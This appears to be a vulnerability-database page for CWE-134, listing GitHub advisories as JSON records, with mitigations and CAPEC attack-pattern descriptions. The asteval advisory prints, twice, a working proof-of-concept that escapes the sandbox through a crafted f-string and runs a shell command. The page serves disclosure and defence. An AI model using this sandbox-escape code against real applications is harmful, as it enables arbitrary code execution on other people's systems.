Common Weakness Enumeration

CWE-134

Allowed

Use of Externally-Controlled Format String

Abstraction: Base · Status: Draft

The product uses a function that accepts a format string as an argument, but the format string originates from an external source.

500 vulnerabilities reference this CWE, most recent first.

GHSA-3QWX-FR6J-M6R7

Vulnerability from github – Published: 2022-05-17 02:49 – Updated: 2022-05-17 02:49
VLAI
Details

Format string vulnerability in GNU a2ps 4.14 allows remote attackers to execute arbitrary code.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2015-8107"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-134"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-04-13T14:59:00Z",
    "severity": "HIGH"
  },
  "details": "Format string vulnerability in GNU a2ps 4.14 allows remote attackers to execute arbitrary code.",
  "id": "GHSA-3qwx-fr6j-m6r7",
  "modified": "2022-05-17T02:49:26Z",
  "published": "2022-05-17T02:49:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8107"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/oss-sec/2015/q4/284"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/77595"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3VQQ-6VGG-H45H

Vulnerability from github – Published: 2023-09-07 09:30 – Updated: 2024-03-27 09:30
VLAI
Details

It is identified a format string vulnerability in ASUS RT-AX56U V2’s General function API. This vulnerability is caused by lacking validation for a specific value within its apply.cgi module. An unauthenticated remote attacker can exploit this vulnerability without privilege to perform remote arbitrary code execution, arbitrary system operation or disrupt service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-39239"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-134"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-07T08:15:07Z",
    "severity": "HIGH"
  },
  "details": "\nIt is identified a format string vulnerability in ASUS RT-AX56U V2\u2019s General function API. This vulnerability is caused by lacking validation for a specific value within its  apply.cgi module. An unauthenticated remote attacker can exploit this vulnerability without privilege to perform remote arbitrary code execution, arbitrary system operation or disrupt service.\n\n\n\n\n",
  "id": "GHSA-3vqq-6vgg-h45h",
  "modified": "2024-03-27T09:30:39Z",
  "published": "2023-09-07T09:30:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39239"
    },
    {
      "type": "WEB",
      "url": "https://https://www.twcert.org.tw/tw/cp-132-7355-0ce8d-1.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3W36-WF5X-RJFV

Vulnerability from github – Published: 2022-05-24 16:50 – Updated: 2025-10-22 00:31
VLAI
Details

Remote Code Execution in PAN-OS 7.1.18 and earlier, PAN-OS 8.0.11 and earlier, and PAN-OS 8.1.2 and earlier with GlobalProtect Portal or GlobalProtect Gateway Interface enabled may allow an unauthenticated remote attacker to execute arbitrary code.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-1579"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-134"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-07-19T22:15:00Z",
    "severity": "HIGH"
  },
  "details": "Remote Code Execution in PAN-OS 7.1.18 and earlier, PAN-OS 8.0.11 and earlier, and PAN-OS 8.1.2 and earlier with GlobalProtect Portal or GlobalProtect Gateway Interface enabled may allow an unauthenticated remote attacker to execute arbitrary code.",
  "id": "GHSA-3w36-wf5x-rjfv",
  "modified": "2025-10-22T00:31:43Z",
  "published": "2022-05-24T16:50:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1579"
    },
    {
      "type": "WEB",
      "url": "https://devco.re/blog/2019/07/17/attacking-ssl-vpn-part-1-PreAuth-RCE-on-Palo-Alto-GlobalProtect-with-Uber-as-case-study"
    },
    {
      "type": "WEB",
      "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0010"
    },
    {
      "type": "WEB",
      "url": "https://security.paloaltonetworks.com/CVE-2019-1579"
    },
    {
      "type": "WEB",
      "url": "https://securityadvisories.paloaltonetworks.com/Home/Detail/158"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-1579"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/109310"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3WP4-F8XR-849X

Vulnerability from github – Published: 2026-05-21 09:32 – Updated: 2026-05-21 09:32
VLAI
Details

A format string argument mismatch in Netatalk 3.0.3 through 4.4.2 allows a remote authenticated attacker to cause a minor denial of service via crafted input that triggers incorrect format string processing.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-7835"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-134"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-21T08:16:23Z",
    "severity": "LOW"
  },
  "details": "A format string argument mismatch in Netatalk 3.0.3 through 4.4.2 allows a remote authenticated attacker to cause a minor denial of service via crafted input that triggers incorrect format string processing.",
  "id": "GHSA-3wp4-f8xr-849x",
  "modified": "2026-05-21T09:32:11Z",
  "published": "2026-05-21T09:32:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7835"
    },
    {
      "type": "WEB",
      "url": "https://netatalk.io/security/CVE-2026-7835"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3WWR-3G9F-9GC7

Vulnerability from github – Published: 2025-01-24 18:45 – Updated: 2025-01-25 00:54
VLAI
Summary
ASTEVAL Allows Maliciously Crafted Format Strings to Lead to Sandbox Escape
Details

Summary

If an attacker can control the input to the asteval library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library.

Details

The vulnerability is rooted in how asteval performs handling of FormattedValue AST nodes. In particular, the on_formattedvalue value uses the dangerous format method of the str class, as shown in the vulnerable code snippet below:

    def on_formattedvalue(self, node): # ('value', 'conversion', 'format_spec')
        "formatting used in f-strings"
        val = self.run(node.value)
        fstring_converters = {115: str, 114: repr, 97: ascii}
        if node.conversion in fstring_converters:
            val = fstring_converters[node.conversion](val)
        fmt = '{__fstring__}'
        if node.format_spec is not None:
            fmt = f'{{__fstring__:{self.run(node.format_spec)}}}'
        return fmt.format(__fstring__=val)

The code above allows an attacker to manipulate the value of the string used in the dangerous call fmt.format(__fstring__=val). This vulnerability can be exploited to access protected attributes by intentionally triggering an AttributeError exception. The attacker can then catch the exception and use its obj attribute to gain arbitrary access to sensitive or protected object properties.

PoC

The following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the whoami command on the host machine:

from asteval import Interpreter
aeval = Interpreter()
code = """
# def lender():
#     ga

def pwn():
    try:
        f"{dict.mro()[1]:'\\x7B__fstring__.__getattribute__.s\\x7D'}"
    except Exception as ga:
        ga = ga.obj
        sub = ga(dict.mro()[1],"__subclasses__")()
        importer = None
        for i in sub:
            if "BuiltinImporter" in str(i):
                importer = i.load_module
                break
        os = importer("os")
        os.system("whoami")

# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below
# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works

pwn()
"""
aeval(code)

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.5"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "asteval"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-24359"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-134",
      "CWE-749"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-01-24T18:45:30Z",
    "nvd_published_at": "2025-01-24T17:15:16Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nIf an attacker can control the input to the `asteval` library, they can bypass asteval\u0027s restrictions and execute arbitrary Python code in the context of the application using the library.\n\n### Details\nThe vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the [`on_formattedvalue`](https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507) value uses the [dangerous format method of the str class](https://lucumr.pocoo.org/2016/12/29/careful-with-str-format/), as shown in the vulnerable code snippet below:\n\n```py\n    def on_formattedvalue(self, node): # (\u0027value\u0027, \u0027conversion\u0027, \u0027format_spec\u0027)\n        \"formatting used in f-strings\"\n        val = self.run(node.value)\n        fstring_converters = {115: str, 114: repr, 97: ascii}\n        if node.conversion in fstring_converters:\n            val = fstring_converters[node.conversion](val)\n        fmt = \u0027{__fstring__}\u0027\n        if node.format_spec is not None:\n            fmt = f\u0027{{__fstring__:{self.run(node.format_spec)}}}\u0027\n        return fmt.format(__fstring__=val)\n```\n\nThe code above allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties.\n\n### PoC\nThe following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine:\n\n```py\nfrom asteval import Interpreter\naeval = Interpreter()\ncode = \"\"\"\n# def lender():\n#     ga\n    \ndef pwn():\n    try:\n        f\"{dict.mro()[1]:\u0027\\\\x7B__fstring__.__getattribute__.s\\\\x7D\u0027}\"\n    except Exception as ga:\n        ga = ga.obj\n        sub = ga(dict.mro()[1],\"__subclasses__\")()\n        importer = None\n        for i in sub:\n            if \"BuiltinImporter\" in str(i):\n                importer = i.load_module\n                break\n        os = importer(\"os\")\n        os.system(\"whoami\")\n\n# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below\n# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works\n        \npwn()\n\"\"\"\naeval(code)\n\n```",
  "id": "GHSA-3wwr-3g9f-9gc7",
  "modified": "2025-01-25T00:54:49Z",
  "published": "2025-01-24T18:45:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24359"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lmfit/asteval/commit/45bb47533f7abb5479618ae7f6a809215700dcb2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lmfit/asteval"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507"
    },
    {
      "type": "WEB",
      "url": "https://lucumr.pocoo.org/2016/12/29/careful-with-str-format"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ASTEVAL Allows Maliciously Crafted Format Strings to Lead to Sandbox Escape"
}

GHSA-3X92-JHWW-8QJ8

Vulnerability from github – Published: 2022-05-13 01:37 – Updated: 2022-05-13 01:37
VLAI
Details

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of NetGain Systems Enterprise Manager v7.2.699 build 1001. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the content parameter provided to the script_test.jsp endpoint. A crafted content request parameter can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code under the context of the web service. Was ZDI-CAN-5080.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-17407"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-134"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-01-23T01:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of NetGain Systems Enterprise Manager v7.2.699 build 1001. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the content parameter provided to the script_test.jsp endpoint. A crafted content request parameter can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code under the context of the web service. Was ZDI-CAN-5080.",
  "id": "GHSA-3x92-jhww-8qj8",
  "modified": "2022-05-13T01:37:18Z",
  "published": "2022-05-13T01:37:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-17407"
    },
    {
      "type": "WEB",
      "url": "https://zerodayinitiative.com/advisories/ZDI-17-954"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-436R-9CVQ-HJQ5

Vulnerability from github – Published: 2022-03-30 00:00 – Updated: 2022-04-06 00:01
VLAI
Details

A Format String vulnerability exists in DrayTek Vigor 2960 <= 1.5.1.3, DrayTek Vigor 3900 <= 1.5.1.3, and DrayTek Vigor 300B <= 1.5.1.3 in the mainfunction.cgi file via a crafted HTTP message containing malformed QUERY STRING, which could let a remote malicious user execute arbitrary code.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-42911"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-134"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-03-29T20:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "A Format String vulnerability exists in DrayTek Vigor 2960 \u003c= 1.5.1.3, DrayTek Vigor 3900 \u003c= 1.5.1.3, and DrayTek Vigor 300B \u003c= 1.5.1.3 in the mainfunction.cgi file via a crafted HTTP message containing malformed QUERY STRING, which could let a remote malicious user execute arbitrary code.",
  "id": "GHSA-436r-9cvq-hjq5",
  "modified": "2022-04-06T00:01:57Z",
  "published": "2022-03-30T00:00:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42911"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/Cossack9989/e9c1c2d2e69b773ca4251acdd77f2835"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-43GP-2VCJ-4VXJ

Vulnerability from github – Published: 2022-05-02 03:16 – Updated: 2022-05-02 03:16
VLAI
Details

Format string vulnerability in Wireshark 0.99.8 through 1.0.5 on non-Windows platforms allows local users to cause a denial of service (application crash) via format string specifiers in the HOME environment variable.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2009-0601"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-134"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2009-02-16T20:30:00Z",
    "severity": "LOW"
  },
  "details": "Format string vulnerability in Wireshark 0.99.8 through 1.0.5 on non-Windows platforms allows local users to cause a denial of service (application crash) via format string specifiers in the HOME environment variable.",
  "id": "GHSA-43gp-2vcj-4vxj",
  "modified": "2022-05-02T03:16:57Z",
  "published": "2022-05-02T03:16:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-0601"
    },
    {
      "type": "WEB",
      "url": "https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=3150"
    },
    {
      "type": "WEB",
      "url": "https://issues.rpath.com/browse/RPL-2984"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2009-03/msg00000.html"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/34264"
    },
    {
      "type": "WEB",
      "url": "http://wiki.rpath.com/Advisories:rPSA-2009-0040"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/501763/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/33690"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id?1021697"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2009/0370"
    },
    {
      "type": "WEB",
      "url": "http://www.wireshark.org/security/wnpa-sec-2009-01.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-4426-49XV-WXG5

Vulnerability from github – Published: 2022-05-17 01:47 – Updated: 2022-05-17 01:47
VLAI
Details

Multiple format string vulnerabilities in FlightGear 2.6 and earlier and SimGear 2.6 and earlier allow user-assisted remote attackers to cause a denial of service and possibly execute arbitrary code via format string specifiers in certain data chunk values in an aircraft xml model to (1) fgfs/flightgear/src/Cockpit/panel.cxx or (2) fgfs/flightgear/src/Network/generic.cxx, or (3) a scene graph model to simgear/simgear/scene/model/SGText.cxx.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2012-2090"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-134"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2012-06-17T03:41:00Z",
    "severity": "HIGH"
  },
  "details": "Multiple format string vulnerabilities in FlightGear 2.6 and earlier and SimGear 2.6 and earlier allow user-assisted remote attackers to cause a denial of service and possibly execute arbitrary code via format string specifiers in certain data chunk values in an aircraft xml model to (1) fgfs/flightgear/src/Cockpit/panel.cxx or (2) fgfs/flightgear/src/Network/generic.cxx, or (3) a scene graph model to simgear/simgear/scene/model/SGText.cxx.",
  "id": "GHSA-4426-49xv-wxg5",
  "modified": "2022-05-17T01:47:00Z",
  "published": "2022-05-17T01:47:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-2090"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=811617"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74791"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/201603-12"
    },
    {
      "type": "WEB",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081997.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082002.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082017.html"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/48780"
    },
    {
      "type": "WEB",
      "url": "http://sourceforge.net/mailarchive/message.php?msg_id=28957051"
    },
    {
      "type": "WEB",
      "url": "http://sourceforge.net/mailarchive/message.php?msg_id=29012174"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2012/04/10/13"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-4764-M84F-XPJW

Vulnerability from github – Published: 2022-05-17 03:55 – Updated: 2025-04-12 12:58
VLAI
Details

Format string vulnerability in the CmdKeywords function in funct1.c in latex2rtf before 2.3.10 allows remote attackers to execute arbitrary code via format string specifiers in the \keywords command in a crafted TeX file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2015-8106"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-134"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2016-04-18T14:59:00Z",
    "severity": "HIGH"
  },
  "details": "Format string vulnerability in the CmdKeywords function in funct1.c in latex2rtf before 2.3.10 allows remote attackers to execute arbitrary code via format string specifiers in the \\keywords command in a crafted TeX file.",
  "id": "GHSA-4764-m84f-xpjw",
  "modified": "2025-04-12T12:58:48Z",
  "published": "2022-05-17T03:55:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8106"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1282492"
    },
    {
      "type": "WEB",
      "url": "https://sourceforge.net/p/latex2rtf/code/1244"
    },
    {
      "type": "WEB",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-April/181276.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-April/181677.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-April/181725.html"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2015/11/16/3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Requirements

Choose a language that is not subject to this flaw.

Mitigation
Implementation

Ensure that all format string functions are passed a static string which cannot be controlled by the user, and that the proper number of arguments are always sent to that function as well. If at all possible, use functions that do not support the %n operator in format strings. [REF-116] [REF-117]

Mitigation
Build and Compilation

Run compilers and linkers with high warning levels, since they may detect incorrect usage.

CAPEC-135: Format String Injection

An adversary includes formatting characters in a string input field on the target application. Most applications assume that users will provide static text and may respond unpredictably to the presence of formatting character. For example, in certain functions of the C programming languages such as printf, the formatting character %s will print the contents of a memory location expecting this location to identify a string and the formatting character %n prints the number of DWORD written in the memory. An adversary can use this to read or write to memory locations or files, or simply to manipulate the value of the resulting text in unexpected ways. Reading or writing memory may result in program crashes and writing memory could result in the execution of arbitrary code if the adversary can write to the program stack.

CAPEC-67: String Format Overflow in syslog()

This attack targets applications and software that uses the syslog() function insecurely. If an application does not explicitely use a format string parameter in a call to syslog(), user input can be placed in the format string parameter leading to a format string injection attack. Adversaries can then inject malicious format string commands into the function call leading to a buffer overflow. There are many reported software vulnerabilities with the root cause being a misuse of the syslog() function.